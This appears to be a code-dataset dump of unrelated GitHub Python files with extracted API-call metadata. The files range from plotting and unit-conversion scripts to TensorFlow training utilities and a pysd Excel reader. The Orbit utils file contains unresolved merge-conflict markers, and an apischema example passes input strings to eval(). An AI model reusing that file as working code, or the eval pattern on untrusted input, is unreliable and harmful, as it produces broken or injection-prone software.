'logging.getLogger', (['__name__'], {}), '(__name__)\n', (9146, 9156), False, 'import logging\n')] |
Wadden12/Semester1 | Graphing/Example1.py | a13c4486848daec3b5865e8a2a778689c81528fe | #!/usr/bin/python3
import numpy as np
import matplotlib.pyplot as plt
t = np.arange(0.0, 3.0, 0.01)
s = np.sin(2.5 * np.pi * t)
plt.plot(t, s)
plt.xlabel('time (s)')
plt.ylabel('voltage (mV)')
plt.title('Sine Wave')
plt.grid(True)
plt.show() | [((76, 101), 'numpy.arange', 'np.arange', (['(0.0)', '(3.0)', '(0.01)'], {}), '(0.0, 3.0, 0.01)\n', (85, 101), True, 'import numpy as np\n'), ((106, 129), 'numpy.sin', 'np.sin', (['(2.5 * np.pi * t)'], {}), '(2.5 * np.pi * t)\n', (112, 129), True, 'import numpy as np\n'), ((130, 144), 'matplotlib.pyplot.plot', 'plt.plot', (['t', 's'], {}), '(t, s)\n', (138, 144), True, 'import matplotlib.pyplot as plt\n'), ((146, 168), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""time (s)"""'], {}), "('time (s)')\n", (156, 168), True, 'import matplotlib.pyplot as plt\n'), ((169, 195), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""voltage (mV)"""'], {}), "('voltage (mV)')\n", (179, 195), True, 'import matplotlib.pyplot as plt\n'), ((197, 219), 'matplotlib.pyplot.title', 'plt.title', (['"""Sine Wave"""'], {}), "('Sine Wave')\n", (206, 219), True, 'import matplotlib.pyplot as plt\n'), ((220, 234), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (228, 234), True, 'import matplotlib.pyplot as plt\n'), ((236, 246), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (244, 246), True, 'import matplotlib.pyplot as plt\n')] |
gentildf/Python | Cursoemvideo/desafios/desafio008.py | bb333e55b197492eac1294619ca7b13ef57bb631 | #Escreva um programa que leia um valor em metros e o exiba convertido em centimetros e milimetros.
n = float(input('\033[32mDigite o numero:\033[m'))
print('O número digitado é \033[33m{0:.0f}m\033[m.\n'
'Ele apresentado em centimetros fica \033[33m{0:.2f}cm\033[m.\n'
'Apresentado em milímetros fica \033[33m{0:.3f}mm\033[m'
.format(n))
#print('O número em metros é {0}.\n
# O número em convertido para centimetros é {1}.\n
# O número convertido para milimetros é {2}'
# .format(n, n/100, n/1000))
| [] |
Dordoloy/BachelorDIM-Lectures-Algorithms-2019 | publish_fanout.py | 14e3e7132eecf62e3476dbea4d9db32adf1544ff | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 21 08:47:08 2019
@author: dordoloy
"""
import os
import pika
import config
import getpass
def publish_fanout():
amqp_url=config.amqp_url
# Parse CLODUAMQP_URL (fallback to localhost)
url = os.environ.get('CLOUDAMQP_URL',amqp_url)
params = pika.URLParameters(url)
params.socket_timeout = 5
connection = pika.BlockingConnection(params) # Connect to CloudAMQP
properties = pika.BasicProperties()
channel = connection.channel()
channel.exchange_declare(exchange='posts',
exchange_type='fanout')
channel.basic_publish(exchange='posts',
routing_key='',
body='message')
print("send")
publish_fanout() | [((262, 303), 'os.environ.get', 'os.environ.get', (['"""CLOUDAMQP_URL"""', 'amqp_url'], {}), "('CLOUDAMQP_URL', amqp_url)\n", (276, 303), False, 'import os\n'), ((316, 339), 'pika.URLParameters', 'pika.URLParameters', (['url'], {}), '(url)\n', (334, 339), False, 'import pika\n'), ((392, 423), 'pika.BlockingConnection', 'pika.BlockingConnection', (['params'], {}), '(params)\n', (415, 423), False, 'import pika\n'), ((469, 491), 'pika.BasicProperties', 'pika.BasicProperties', ([], {}), '()\n', (489, 491), False, 'import pika\n')] |
xjx0524/models | orbit/utils.py | 99be973aa8168a0d2275d475883b3256b193251f | <<<<<<< HEAD
# Lint as: python3
=======
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
# Copyright 2020 The Orbit Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Some layered modules/functions to help users writing custom training loop."""
import abc
import contextlib
import functools
import inspect
<<<<<<< HEAD
=======
import os
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
import numpy as np
import tensorflow as tf
def create_loop_fn(step_fn):
"""Creates a multiple steps function driven by the python while loop.
Args:
step_fn: A function which takes `iterator` as input.
Returns:
A callable defined as the `loop_fn` defination below.
"""
def loop_fn(iterator, num_steps, state=None, reduce_fn=None):
"""A loop function with multiple steps.
Args:
iterator: A nested structure of tf.data `Iterator` or
`DistributedIterator`.
num_steps: The number of steps in the loop. If `num_steps==-1`, will
iterate until exausting the iterator.
state: An optional initial state before running the loop.
reduce_fn: a callable defined as `def reduce_fn(state, value)`, where
`value` is the outputs from `step_fn`.
Returns:
The updated state.
"""
try:
step = 0
# To make sure the OutOfRangeError exception can be handled well with
# async remote eager, we need to wrap the loop body in a `async_scope`.
with tf.experimental.async_scope():
while (num_steps == -1 or step < num_steps):
outputs = step_fn(iterator)
if reduce_fn is not None:
state = reduce_fn(state, outputs)
step += 1
return state
except (StopIteration, tf.errors.OutOfRangeError):
tf.experimental.async_clear_error()
return state
return loop_fn
def create_tf_while_loop_fn(step_fn):
"""Create a multiple steps function driven by tf.while_loop on the host.
Args:
step_fn: A function which takes `iterator` as input.
Returns:
A callable defined as the `loop_fn` defination below.
"""
def loop_fn(iterator, num_steps):
"""A loop function with multiple steps.
Args:
iterator: A nested structure of tf.data `Iterator` or
`DistributedIterator`.
num_steps: The number of steps in the loop. Must be a tf.Tensor.
"""
if not isinstance(num_steps, tf.Tensor):
raise ValueError("`num_steps` should be an `tf.Tensor`. Python object "
"may cause retracing.")
for _ in tf.range(num_steps):
step_fn(iterator)
return loop_fn
<<<<<<< HEAD
=======
def create_global_step() -> tf.Variable:
"""Creates a `tf.Variable` suitable for use as a global step counter.
Creating and managing a global step variable may be necessary for
`AbstractTrainer` subclasses that perform multiple parameter updates per
`Controller` "step", or use different optimizers on different steps.
In these cases, an `optimizer.iterations` property generally can't be used
directly, since it would correspond to parameter updates instead of iterations
in the `Controller`'s training loop. Such use cases should simply call
`step.assign_add(1)` at the end of each step.
Returns:
A non-trainable scalar `tf.Variable` of dtype `tf.int64`, with only the
first replica's value retained when synchronizing across replicas in
a distributed setting.
"""
return tf.Variable(
0,
dtype=tf.int64,
trainable=False,
aggregation=tf.VariableAggregation.ONLY_FIRST_REPLICA)
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
def make_distributed_dataset(strategy, dataset_or_fn, *args, **kwargs):
"""A helper function to create distributed dataset.
Args:
strategy: An instance of `tf.distribute.Strategy`.
dataset_or_fn: A instance of `tf.data.Dataset` or a function which takes an
`tf.distribute.InputContext` as input and returns a `tf.data.Dataset`. If
it is a function, it could optionally have an argument named
`input_context` which is `tf.distribute.InputContext` argument type.
*args: The list of arguments to be passed to dataset_or_fn.
**kwargs: Any keyword arguments to be passed.
Returns:
A distributed Dataset.
"""
if strategy is None:
strategy = tf.distribute.get_strategy()
if isinstance(dataset_or_fn, tf.data.Dataset):
return strategy.experimental_distribute_dataset(dataset_or_fn)
if not callable(dataset_or_fn):
raise ValueError("`dataset_or_fn` should be either callable or an instance "
"of `tf.data.Dataset`")
def dataset_fn(ctx):
"""Wrapped dataset function for creating distributed dataset.."""
# If `dataset_or_fn` is a function and has `input_context` as argument
# names, pass `ctx` as the value of `input_context` when calling
# `dataset_or_fn`. Otherwise `ctx` will not be used when calling
# `dataset_or_fn`.
argspec = inspect.getfullargspec(dataset_or_fn)
args_names = argspec.args
if "input_context" in args_names:
kwargs["input_context"] = ctx
ds = dataset_or_fn(*args, **kwargs)
return ds
return strategy.experimental_distribute_datasets_from_function(dataset_fn)
class SummaryManager:
"""A class manages writing summaries."""
def __init__(self, summary_dir, summary_fn, global_step=None):
"""Construct a summary manager object.
Args:
summary_dir: the directory to write summaries.
summary_fn: A callable defined as `def summary_fn(name, tensor,
step=None)`, which describes the summary operation.
global_step: A `tf.Variable` instance for the global step.
"""
self._enabled = (summary_dir is not None)
self._summary_dir = summary_dir
self._summary_fn = summary_fn
<<<<<<< HEAD
self._summary_writer = None
=======
self._summary_writers = {}
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
if global_step is None:
self._global_step = tf.summary.experimental.get_step()
else:
self._global_step = global_step
<<<<<<< HEAD
@property
def summary_writer(self):
"""Returns the underlying summary writer."""
if self._summary_writer is not None:
return self._summary_writer
if self._enabled:
self._summary_writer = tf.summary.create_file_writer(self._summary_dir)
else:
self._summary_writer = tf.summary.create_noop_writer()
return self._summary_writer
def flush(self):
"""Flush the underlying summary writer."""
if self._enabled:
tf.summary.flush(self.summary_writer)
def write_summaries(self, items):
"""Write a bulk of summaries.
Args:
items: a dictionary of `Tensors` for writing summaries.
"""
# TODO(rxsang): Support writing summaries with nested structure, so users
# can split the summaries into different directories for nicer visualization
# in Tensorboard, like train and eval metrics.
if not self._enabled:
return
with self.summary_writer.as_default():
for name, tensor in items.items():
self._summary_fn(name, tensor, step=self._global_step)
=======
def summary_writer(self, relative_path=""):
"""Returns the underlying summary writer.
Args:
relative_path: The current path in which to write summaries, relative to
the summary directory. By default it is empty, which specifies the root
directory.
"""
if self._summary_writers and relative_path in self._summary_writers:
return self._summary_writers[relative_path]
if self._enabled:
self._summary_writers[relative_path] = tf.summary.create_file_writer(
os.path.join(self._summary_dir, relative_path))
else:
self._summary_writers[relative_path] = tf.summary.create_noop_writer()
return self._summary_writers[relative_path]
def flush(self):
"""Flush the underlying summary writers."""
if self._enabled:
tf.nest.map_structure(tf.summary.flush, self._summary_writers)
def write_summaries(self, summary_dict):
"""Write summaries for the given values.
This recursively creates subdirectories for any nested dictionaries
provided in `summary_dict`, yielding a hierarchy of directories which will
then be reflected in the TensorBoard UI as different colored curves.
E.g. users may evaluate on muliple datasets and return `summary_dict` as a
nested dictionary.
```
{
"dataset": {
"loss": loss,
"accuracy": accuracy
},
"dataset2": {
"loss": loss2,
"accuracy": accuracy2
},
}
```
This will create two subdirectories "dataset" and "dataset2" inside the
summary root directory. Each directory will contain event files including
both "loss" and "accuracy" summaries.
Args:
summary_dict: A dictionary of values. If any value in `summary_dict` is
itself a dictionary, then the function will recursively create
subdirectories with names given by the keys in the dictionary. The
Tensor values are summarized using the summary writer instance specific
to the parent relative path.
"""
if not self._enabled:
return
self._write_summaries(summary_dict)
def _write_summaries(self, summary_dict, relative_path=""):
for name, value in summary_dict.items():
if isinstance(value, dict):
self._write_summaries(
value, relative_path=os.path.join(relative_path, name))
else:
with self.summary_writer(relative_path).as_default():
self._summary_fn(name, value, step=self._global_step)
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
class Trigger(metaclass=abc.ABCMeta):
"""An abstract class representing a "trigger" for some event."""
@abc.abstractmethod
def __call__(self, value: float, force_trigger=False):
"""Maybe trigger the event based on the given value.
Args:
value: the value for triggering.
force_trigger: Whether the trigger is forced triggered.
Returns:
`True` if the trigger is triggered on the given `value`, and
`False` otherwise.
"""
@abc.abstractmethod
def reset(self):
"""Reset states in the trigger."""
class IntervalTrigger(Trigger):
"""Triggers on every fixed interval."""
def __init__(self, interval, start=0):
"""Constructs the IntervalTrigger.
Args:
interval: The triggering interval.
start: An initial value for the trigger.
"""
self._interval = interval
self._last_trigger_value = start
def __call__(self, value, force_trigger=False):
"""Maybe trigger the event based on the given value.
Args:
value: the value for triggering.
force_trigger: If True, the trigger will be forced triggered unless the
last trigger value is equal to `value`.
Returns:
`True` if the trigger is triggered on the given `value`, and
`False` otherwise.
"""
if force_trigger and value != self._last_trigger_value:
self._last_trigger_value = value
return True
if self._interval and self._interval > 0:
if value >= self._last_trigger_value + self._interval:
self._last_trigger_value = value
return True
return False
def reset(self):
"""See base class."""
self._last_trigger_value = 0
class EpochHelper:
"""A Helper class to handle epochs in Customized Training Loop."""
def __init__(self, epoch_steps, global_step):
"""Constructs the EpochHelper.
Args:
epoch_steps: An integer indicates how many steps in an epoch.
global_step: A `tf.Variable` instance indicates the current global step.
"""
self._epoch_steps = epoch_steps
self._global_step = global_step
self._current_epoch = None
self._epoch_start_step = None
self._in_epoch = False
def epoch_begin(self):
"""Returns whether a new epoch should begin."""
if self._in_epoch:
return False
current_step = self._global_step.numpy()
self._epoch_start_step = current_step
self._current_epoch = current_step // self._epoch_steps
self._in_epoch = True
return True
def epoch_end(self):
"""Returns whether the current epoch should end."""
if not self._in_epoch:
raise ValueError("`epoch_end` can only be called inside an epoch")
current_step = self._global_step.numpy()
epoch = current_step // self._epoch_steps
if epoch > self._current_epoch:
self._in_epoch = False
return True
return False
@property
def batch_index(self):
"""Index of the next batch within the current epoch."""
return self._global_step.numpy() - self._epoch_start_step
@property
def current_epoch(self):
return self._current_epoch
@contextlib.contextmanager
def _soft_device_placement():
"""Context manager for soft device placement, allowing summaries on CPU."""
original_setting = tf.config.get_soft_device_placement()
try:
tf.config.set_soft_device_placement(True)
yield
finally:
tf.config.set_soft_device_placement(original_setting)
def train_function_with_summaries(*args, **kwargs):
"""Utility function to support TPU summaries via multiple `tf.function`s.
This permits interleaving summaries inside TPU-compatible code, but without
any performance impact on steps that do not write summaries.
Usage is as a decorator, similar to `tf.function`, and any `tf.function`
arguments will be passed through if supplied:
@trainer.train_function_with_summaries
def train(self, num_steps):
...
The decorated function is assumed to be a loop method accepting a `num_steps`
parameter, as for instance would be called within the `Controller`'s outer
train loop. The implementation here assumes that `summary_frequency` is
divisible by `steps_per_loop`. The decorated method should accept two
arguments, `self` and `num_steps`.
Two `tf.function` versions of `train_fn` are created: one inside a summary
writer scope with soft device placement enabled (used on steps that require
summary writing), and one with no summary writer present and soft device
placement disabled (used on all other steps).
Args:
*args: Arguments to pass through to `tf.function`.
**kwargs: Keyword arguments to pass through to `tf.function`.
Returns:
If the first argument is a callable, returns the decorated callable.
Otherwise, returns a decorator.
"""
def decorator(train_fn):
# TODO(dhr): Validate the signature of train_fn?
train_fn_with_summaries = tf.function(train_fn, *args, **kwargs)
train_fn_without_summaries = tf.function(train_fn, *args, **kwargs)
@functools.wraps(train_fn)
def wrapper(self, num_steps):
if tf.summary.should_record_summaries():
with _soft_device_placement():
output = train_fn_with_summaries(self, tf.constant(1))
num_steps -= 1
if num_steps >= 1:
with tf.summary.record_if(False):
output = train_fn_without_summaries(self, num_steps)
return output
return wrapper
if args and callable(args[0]):
train_fn, args = args[0], args[1:]
return decorator(train_fn)
return decorator
def get_value(x) -> np.ndarray:
"""Returns the value of a variable/tensor.
Args:
x: input variable.
Returns:
<<<<<<< HEAD
A Numpy array.
=======
A Numpy array or number.
>>>>>>> a811a3b7e640722318ad868c99feddf3f3063e36
"""
if not tf.is_tensor(x):
return x
return x.numpy()
| [] |
whitepeaony/exercism-python | python/word-count/word_count.py | 5c947ba5c589f1969bcb754e88969420262c457e | def count_words(sentence):
sentence = sentence.lower()
words = {}
shit = ',\n:!&@$%^&._'
for s in shit:
sentence = sentence.replace(s, ' ')
for w in sentence.split():
if w.endswith('\''):
w = w[:-1]
if w.startswith('\''):
w = w[1:]
words[w] = words.get(w, 0) + 1
return words
| [] |
klauer/apischema | examples/multiple_deserializers.py | 0da9b96b74dabe8704e2dcfca4502aed98500799 | from dataclasses import dataclass
from apischema import deserialize, deserializer
from apischema.json_schema import deserialization_schema
@dataclass
class Expression:
value: int
@deserializer
def evaluate_expression(expr: str) -> Expression:
return Expression(int(eval(expr)))
# Could be shorten into deserializer(Expression), because class is callable too
@deserializer
def expression_from_value(value: int) -> Expression:
return Expression(value)
assert deserialization_schema(Expression) == {
"$schema": "http://json-schema.org/draft/2019-09/schema#",
"type": ["string", "integer"],
}
assert deserialize(Expression, 0) == deserialize(Expression, "1 - 1") == Expression(0)
| [((478, 512), 'apischema.json_schema.deserialization_schema', 'deserialization_schema', (['Expression'], {}), '(Expression)\n', (500, 512), False, 'from apischema.json_schema import deserialization_schema\n'), ((625, 651), 'apischema.deserialize', 'deserialize', (['Expression', '(0)'], {}), '(Expression, 0)\n', (636, 651), False, 'from apischema import deserialize, deserializer\n'), ((655, 687), 'apischema.deserialize', 'deserialize', (['Expression', '"""1 - 1"""'], {}), "(Expression, '1 - 1')\n", (666, 687), False, 'from apischema import deserialize, deserializer\n')] |
txtbits/daw-python | ficheros/CSV/prueba csv (lm)/alumnos.py | 5dde1207e2791e90aa5e9ce2b6afc4116129efab | # -*- coding: utf-8 -*-
'''
Created on 02/12/2011
@author: chra
'''
import csv
from operator import itemgetter
# ----- Función media de la notas de los alumnos ----------
def media(alumno):
#devuelve la nota media a partir de un diccionario con datos de un alumno
nota1 = int(alumno['Nota1'])
nota2 = int(alumno.get('Nota2'))
nota3 = int(alumno.get('Nota3'))
return (nota1+nota2+nota3) / 3.
# ----------------------------------------------------------
fin = open('alumnos.csv')
lector = csv.DictReader(fin, delimiter=",") # si no se pone delimiter, coge la coma por defecto // devuelve diccionario
# lector = csv.reader(fin, delimiter=",") <-- Devuelve lista
alumnos = []
for linea in lector:
alumnos.append((linea['Alumno'], media(linea)))
# -------- Ordenar por nombre de alumno -----------
alumnos.sort()
print 'Orden por nombre de alumno'
for al in alumnos:
print "%-10s %6.2f" % al #10 espacios entre cadena (nombre - nota media) y permite 6 digitos, 2 de ellos decimales.
# --------------------------------------------------
# --------- Ordenar por nota -----------------------
print '\nOrden por nota'
alumnos.sort(key=itemgetter(1),reverse=True)
for al in alumnos:
print "%-10s %6.2f" % al
#---------------------------------------------------
# Crea un fichero 'lista_ordenada_notas.csv' y escribe la lista ordenada por notas
fw = open('lista_ordenada_notas.csv', 'w')
csvwriter = csv.writer(fw)
for al in alumnos:
csvwriter.writerow(al)
fw.close() | [] |
incrementals/b-star | src/interpreter/functions/math/math.py | 325bb51eafd5c5173582bf065b82d10ef9669275 | from src.interpreter.functions.math.add import add
from src.interpreter.functions.math.div import div
from src.interpreter.functions.math.mod import mod
from src.interpreter.functions.math.mul import mul
from src.interpreter.functions.math.pow import pow_func
from src.interpreter.functions.math.sub import sub
def math_func(number, operator: str, by):
operator = operator.strip()
if operator == "+":
return add(number, by)
elif operator == "-":
return sub(number, by)
elif operator == "/":
return div(number, by)
elif operator == "*":
return mul(number, by)
elif operator == "^":
return pow_func(number, by)
elif operator == "%":
return mod(number, by)
else:
raise Exception("unknown operator: " + operator)
| [((426, 441), 'src.interpreter.functions.math.add.add', 'add', (['number', 'by'], {}), '(number, by)\n', (429, 441), False, 'from src.interpreter.functions.math.add import add\n'), ((483, 498), 'src.interpreter.functions.math.sub.sub', 'sub', (['number', 'by'], {}), '(number, by)\n', (486, 498), False, 'from src.interpreter.functions.math.sub import sub\n'), ((540, 555), 'src.interpreter.functions.math.div.div', 'div', (['number', 'by'], {}), '(number, by)\n', (543, 555), False, 'from src.interpreter.functions.math.div import div\n'), ((597, 612), 'src.interpreter.functions.math.mul.mul', 'mul', (['number', 'by'], {}), '(number, by)\n', (600, 612), False, 'from src.interpreter.functions.math.mul import mul\n'), ((654, 674), 'src.interpreter.functions.math.pow.pow_func', 'pow_func', (['number', 'by'], {}), '(number, by)\n', (662, 674), False, 'from src.interpreter.functions.math.pow import pow_func\n'), ((716, 731), 'src.interpreter.functions.math.mod.mod', 'mod', (['number', 'by'], {}), '(number, by)\n', (719, 731), False, 'from src.interpreter.functions.math.mod import mod\n')] |
monkey2000/pygazetteer | setup.py | 3eb6026b1473f773817a81ebc0060ec455482739 | from setuptools import setup
setup(name='pygazetteer',
version='0.1.0',
description='Location extractor by looking up gazetteer',
url='https://github.com/monkey2000/pygazetteer',
license='MIT',
packages=['pygazetteer'],
install_requires=[
'pyahocorasick'
],
zip_safe=False,
include_package_data=True)
| [((30, 318), 'setuptools.setup', 'setup', ([], {'name': '"""pygazetteer"""', 'version': '"""0.1.0"""', 'description': '"""Location extractor by looking up gazetteer"""', 'url': '"""https://github.com/monkey2000/pygazetteer"""', 'license': '"""MIT"""', 'packages': "['pygazetteer']", 'install_requires': "['pyahocorasick']", 'zip_safe': '(False)', 'include_package_data': '(True)'}), "(name='pygazetteer', version='0.1.0', description=\n 'Location extractor by looking up gazetteer', url=\n 'https://github.com/monkey2000/pygazetteer', license='MIT', packages=[\n 'pygazetteer'], install_requires=['pyahocorasick'], zip_safe=False,\n include_package_data=True)\n", (35, 318), False, 'from setuptools import setup\n')] |
mustx1/MYIQ | iqoptionapi/country_id.py | 3afb597aa8a8abc278b7d70dad46af81789eae3e | ID = {"Worldwide":0,
"AF": 1,
"AL": 2,
"DZ": 3,
"AD": 5,
"AO": 6,
"AI": 7,
"AG": 9,
"AR": 10,
"AM": 11,
"AW": 12,
"AT": 14,
"AZ": 15,
"BS": 16,
"BH": 17,
"BD": 18,
"BB": 19,
"BY": 20,
"BZ": 22,
"BJ": 23,
"BM": 24,
"BO": 26,
"BA": 27,
"BW": 28,
"BV": 29,
"BR": 30,
"BN": 31,
"BG": 32,
"BF": 33,
"BI": 34,
"KH": 35,
"CM": 36,
"CV": 38,
"KY": 39,
"TD": 41,
"CL": 42,
"CN": 43,
"CC": 45,
"CO": 46,
"KM": 47,
"CG": 48,
"CK": 49,
"CR": 50,
"CI": 51,
"HR": 52,
"CU": 53,
"CY": 54,
"CZ": 55,
"DK": 56,
"DJ": 57,
"DM": 58,
"DO": 59,
"TL": 60,
"EC": 61,
"EG": 62,
"SV": 63,
"EE": 66,
"ET": 67,
"FO": 69,
"FJ": 70,
"FI": 71,
"FR": 72,
"GF": 73,
"PF": 74,
"GA": 75,
"GM": 76,
"GE": 77,
"DE": 78,
"GH": 79,
"GR": 81,
"GD": 83,
"GP": 84,
"GT": 86,
"GN": 87,
"GY": 88,
"HT": 89,
"HN": 90,
"HK": 91,
"HU": 92,
"IS": 93,
"ID": 94,
"IQ": 95,
"IE": 96,
"IT": 97,
"JM": 98,
"JO": 100,
"KZ": 101,
"KE": 102,
"KI": 103,
"KW": 104,
"KG": 105,
"LA": 106,
"LV": 107,
"LB": 108,
"LS": 109,
"LR": 110,
"LY": 111,
"LT": 113,
"LU": 114,
"MO": 115,
"MK": 116,
"MG": 117,
"MW": 118,
"MY": 119,
"MV": 120,
"ML": 121,
"MT": 122,
"MQ": 124,
"MR": 125,
"MU": 126,
"MX": 128,
"FM": 129,
"MD": 130,
"MC": 131,
"MN": 132,
"MA": 134,
"MZ": 135,
"MM": 136,
"NA": 137,
"NP": 139,
"NL": 140,
"AN": 141,
"NC": 142,
"NZ": 143,
"NI": 144,
"NE": 145,
"NG": 146,
"NO": 149,
"OM": 150,
"PK": 151,
"PW": 152,
"PA": 153,
"PG": 154,
"PY": 155,
"PE": 156,
"PH": 157,
"PL": 159,
"PT": 160,
"QA": 162,
"RE": 163,
"RO": 164,
"RW": 166,
"KN": 167,
"LC": 168,
"SA": 171,
"SN": 172,
"SC": 173,
"SG": 175,
"SK": 176,
"SI": 177,
"SO": 179,
"ZA": 180,
"KR": 181,
"ES": 182,
"LK": 183,
"SH": 184,
"SR": 186,
"SZ": 187,
"SE": 188,
"CH": 189,
"TW": 191,
"TJ": 192,
"TZ": 193,
"TH": 194,
"TG": 195,
"TT": 198,
"TN": 199,
"TR": 200,
"TM": 201,
"UG": 203,
"UA": 204,
"AE": 205,
"GB": 206,
"UY": 207,
"UZ": 208,
"VE": 211,
"VN": 212,
"VG": 213,
"YE": 216,
"ZM": 218,
"ZW": 219,
"RS": 220,
"ME": 221,
"IN": 225,
"TC": 234,
"CD": 235,
"GG": 236,
"IM": 237,
"JE": 239,
"CW": 246, }
| [] |
rogersamso/pysd_dev | pysd/py_backend/external.py | 85606265aa92878c35a41dd81ce9588d23350e19 | """
These classes are a collection of the needed tools to read external data.
The External type objects created by these classes are initialized before
the Stateful objects by functions.Model.initialize.
"""
import re
import os
import warnings
import pandas as pd # TODO move to openpyxl
import numpy as np
import xarray as xr
from openpyxl import load_workbook
from . import utils
class Excels():
"""
Class to save the read Excel files and thus avoid double reading
"""
_Excels, _Excels_opyxl = {}, {}
@classmethod
def read(cls, file_name, sheet_name):
"""
Read the Excel file or return the previously read one
"""
if file_name + sheet_name in cls._Excels:
return cls._Excels[file_name + sheet_name]
else:
excel = np.array([
pd.to_numeric(ex, errors='coerce')
for ex in
pd.read_excel(file_name, sheet_name, header=None).values
])
cls._Excels[file_name + sheet_name] = excel
return excel
@classmethod
def read_opyxl(cls, file_name):
"""
Read the Excel file using OpenPyXL or return the previously read one
"""
if file_name in cls._Excels_opyxl:
return cls._Excels_opyxl[file_name]
else:
excel = load_workbook(file_name, read_only=True, data_only=True)
cls._Excels_opyxl[file_name] = excel
return excel
@classmethod
def clean(cls):
"""
Clean the dictionary of read files
"""
cls._Excels, cls._Excels_opyxl = {}, {}
class External(object):
"""
Main class of external objects
Attributes
----------
py_name: str
The python name of the object
missing: str ("warning", "error", "ignore", "keep")
What to do with missing values. If "warning" (default)
shows a warning message and interpolates the values.
If "raise" raises an error. If "ignore" interpolates
the values without showing anything. If "keep" it will keep
the missing values, this option may cause the integration to
fail, but it may be used to check the quality of the data.
file: str
File name from which the data is read.
sheet: str
Sheet name from which the data is read.
"""
missing = "warning"
def __init__(self, py_name):
self.py_name = py_name
self.file = None
self.sheet = None
def __str__(self):
return self.py_name
def _get_data_from_file(self, rows, cols):
"""
Function to read data from excel file using rows and columns
Parameters
----------
rows: list of len 2
first row and last row+1 to be read, starting from 0
cols: list of len 2
first col and last col+1 to be read, starting from 0
Returns
-------
data: pandas.DataFrame, pandas.Series or float
depending on the shape of the requested data
"""
# TODO move to openpyxl to avoid pandas dependency in this file.
ext = os.path.splitext(self.file)[1].lower()
if ext in ['.xls', '.xlsx']:
# read data
data = Excels.read(
self.file,
self.sheet)[rows[0]:rows[1], cols[0]:cols[1]].copy()
shape = data.shape
# if it is a single row remove its dimension
if shape[1] == 1:
data = data[:, 0]
if shape[0] == 1:
data = data[0]
return data
raise NotImplementedError(self.py_name + "\n"
+ "The files with extension "
+ ext + " are not implemented")
def _get_data_from_file_opyxl(self, cellname):
"""
Function to read data from excel file using cell range name
Parameters
----------
cellname: str
the cell range name
Returns
-------
data: numpy.ndarray or float
depending on the shape of the requested data
"""
# read data
excel = Excels.read_opyxl(self.file)
try:
# Get the local id of the sheet
# needed for searching in locals names
# need to lower the sheetnames as Vensim has no case sensitivity
sheetId = [sheetname_wb.lower() for sheetname_wb
in excel.sheetnames].index(self.sheet.lower())
except ValueError:
# Error if it is not able to get the localSheetId
raise ValueError(self.py_name + "\n"
+ "The sheet doesn't exist...\n"
+ self._file_sheet)
try:
# Search for local and global names
cellrange = excel.defined_names.get(cellname, sheetId)\
or excel.defined_names.get(cellname)
coordinates = cellrange.destinations
for sheet, cells in coordinates:
if sheet.lower() == self.sheet.lower():
values = excel[sheet][cells]
try:
return np.array(
[[i.value if not isinstance(i.value, str)
else np.nan for i in j] for j in values],
dtype=float)
except TypeError:
return float(values.value)
raise AttributeError
except (KeyError, AttributeError):
# key error if the cellrange doesn't exist in the file or sheet
raise AttributeError(
self.py_name + "\n"
+ "The cell range name:\t {}\n".format(cellname)
+ "Doesn't exist in:\n" + self._file_sheet
)
def _get_series_data(self, series_across, series_row_or_col, cell, size):
"""
Function thar reads series and data from excel file for
DATA and LOOKUPS.
Parameters
----------
series_across: "row", "column" or "name"
The way to read series file.
series_row_or_col: int or str
If series_across is "row" the row number where the series data is.
If series_across is "column" the column name where
the series data is.
If series_across is "name" the cell range name where
the series data is.
cell:
If series_across is not "name, the top left cell where
the data table starts.
Else the name of the cell range where the data is.
size:
The size of the 2nd dimension of the data.
Returns
-------
series, data: ndarray (1D), ndarray(1D/2D)
The values of the series and data.
"""
if series_across == "row":
# Horizontal data (dimension values in a row)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series = self._get_data_from_file(
rows=[int(series_row_or_col)-1, int(series_row_or_col)],
cols=[first_col, None])
# read data
data = self._get_data_from_file(
rows=[first_row, first_row + size],
cols=[first_col, None]).transpose()
elif series_across == "column":
# Vertical data (dimension values in a column)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series_col = self._col_to_num(series_row_or_col)
series = self._get_data_from_file(
rows=[first_row, None],
cols=[series_col, series_col+1])
# read data
data = self._get_data_from_file(
rows=[first_row, None],
cols=[first_col, first_col + size])
else:
# get series data
series = self._get_data_from_file_opyxl(series_row_or_col)
if isinstance(series, float):
series = np.array([[series]])
series_shape = series.shape
if series_shape[0] == 1:
# horizontal definition of lookup/time dimension
series = series[0]
transpose = True
elif series_shape[1] == 1:
# vertical definition of lookup/time dimension
series = series[:, 0]
transpose = False
else:
# Error if the lookup/time dimension is 2D
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\tDimentime_missingsion name:"
+ "\t{}\n".format(series_row_or_col)
+ " is a table and not a vector"
)
# get data
data = self._get_data_from_file_opyxl(cell)
if isinstance(data, float):
data = np.array([[data]])
if transpose:
# transpose for horizontal definition of dimension
data = data.transpose()
if data.shape[0] != len(series):
raise ValueError(
self.py_name + "\n"
+ "Dimension and data given in:\n"
+ self._file_sheet
+ "\tDimension name:\t{}\n".format(series_row_or_col)
+ "\tData name:\t{}\n".format(cell)
+ " don't have the same length in the 1st dimension"
)
if data.shape[1] != size:
# Given coordinates length is different than
# the lentgh of 2nd dimension
raise ValueError(
self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same size as the given coordinates"
)
